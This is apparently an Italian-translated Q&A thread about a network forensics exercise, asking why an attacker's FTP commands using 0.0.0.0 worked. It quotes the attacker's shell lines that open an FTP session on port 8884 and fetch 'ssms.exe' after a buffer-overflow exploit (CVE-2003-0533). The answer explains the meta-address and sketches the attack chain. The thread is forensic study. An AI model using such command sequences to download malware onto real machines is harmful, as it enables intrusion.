Perché questo attacco utilizza 0.0.0.0 come indirizzo IP e perché ha funzionato?

Naviga le tue risposte
4

Lavorando attraverso questo esercizio in rete forense, l'attaccante ha utilizzato un exploit buffer overflow per inviare comandi al prompt dei comandi della vittima. I comandi aprono una sessione FTP e scaricano malware. Sono confuso sul motivo per cui funziona con l'indirizzo IP 0.0.0.0 I pacchetti mostrano che l'attaccante lega una shell sull'host della vittima e usa FTP per forzare il download di un file eseguibile.

I comandi sono: 

echo open 0.0.0.0 8884
echo user 1 1
echo get ssms.exe

La mia domanda è, come potrebbero arrivare ovunque usando l'indirizzo IP 0.0.0.0 ?? La shell legata è in qualche modo associata a / "nella" rete dell'attaccante mentre l'exploit sta succedendo in modo che 0.0.0.0 si risolva in localhost sulla macchina dell'attaccante?

Alcune delle risposte utilizzavano la presenza di questo indirizzo IP per dimostrare che la vittima era un honeypot perché accettava qualsiasi indirizzo IP che l'attaccante ha dato loro e scaricato l'exe come detto. Ancora, come sarebbe 0.0.0.0 arrivare da qualche parte? Inoltre, questo non sarebbe un buon modo per un utente malintenzionato di sapere che ha violato un honeypot?

Una risposta (PDF) fornisce una buona descrizione dell'exploit ma non affronta specificamente questa domanda. Un'altra risposta (PDF) pensa il 0.0.0.0 potrebbe essere un errore, quindi sono confuso.

    
posta mcgyver5 25.08.2015 - 18:44
fonte

1 risposta

5

In the Internet Protocol Version 4, the address 0.0.0.0 is a non-routable meta-address used to designate an invalid, unknown or non-applicable target. To give a special meaning to an otherwise invalid piece of data is an application of in-band signaling.

In the context of servers, 0.0.0.0 means "all IPv4 addresses on the local machine". If a host has two IP addresses, 192.168.1.1 and 10.1.2.1, and a server running on the host listens on 0.0.0.0, it will be reachable at both of those IPs.

In the context of routing, 0.0.0.0 usually means the default route, i.e. the route which leads to "the rest of" the internet instead of somewhere on the local network.

Articolo di Wikipedia su 0.0.0.0

Se dovessi indovinare, dato che non ho fatto la sfida, ma basandomi sul primo link a condizione che l'exploit sia andato in questo modo:

  1. Exploit CVE-2003-0533 - shellcode per collegare la porta TCP 1957 come shell. (forse l'attaccante sapeva che questa porta non era bloccata da un firewall?)
  2. Comandi eseguiti dalla shell per impostare una connessione ftp inversa a se stesso (in questo caso). Esporre questo all'host tramite la porta 8884. Poiché il computer potrebbe avere più IP, 0.0.0.0 è un modo per dire "qualsiasi interfaccia sulla quale funziona la connessione inversa accetterebbe questa connessione. Una connessione inversa potrebbe aiutare in ignorando le regole del firewall
  3. Il server FTP si trova all'altra estremità di questo tunnel, i comandi eseguiti sono stati registrati nel ftp e hanno scaricato il malware nel PC della vittima per l'esecuzione successiva.
risposta data 25.08.2015 - 19:18
fonte

Leggi altre domande sui tag

E 'possibile recuperare i dati da un nodo intermedio nel browser Tor File PDF crittografato con la mia password, vuol dire che la mia password è memorizzata in testo normale?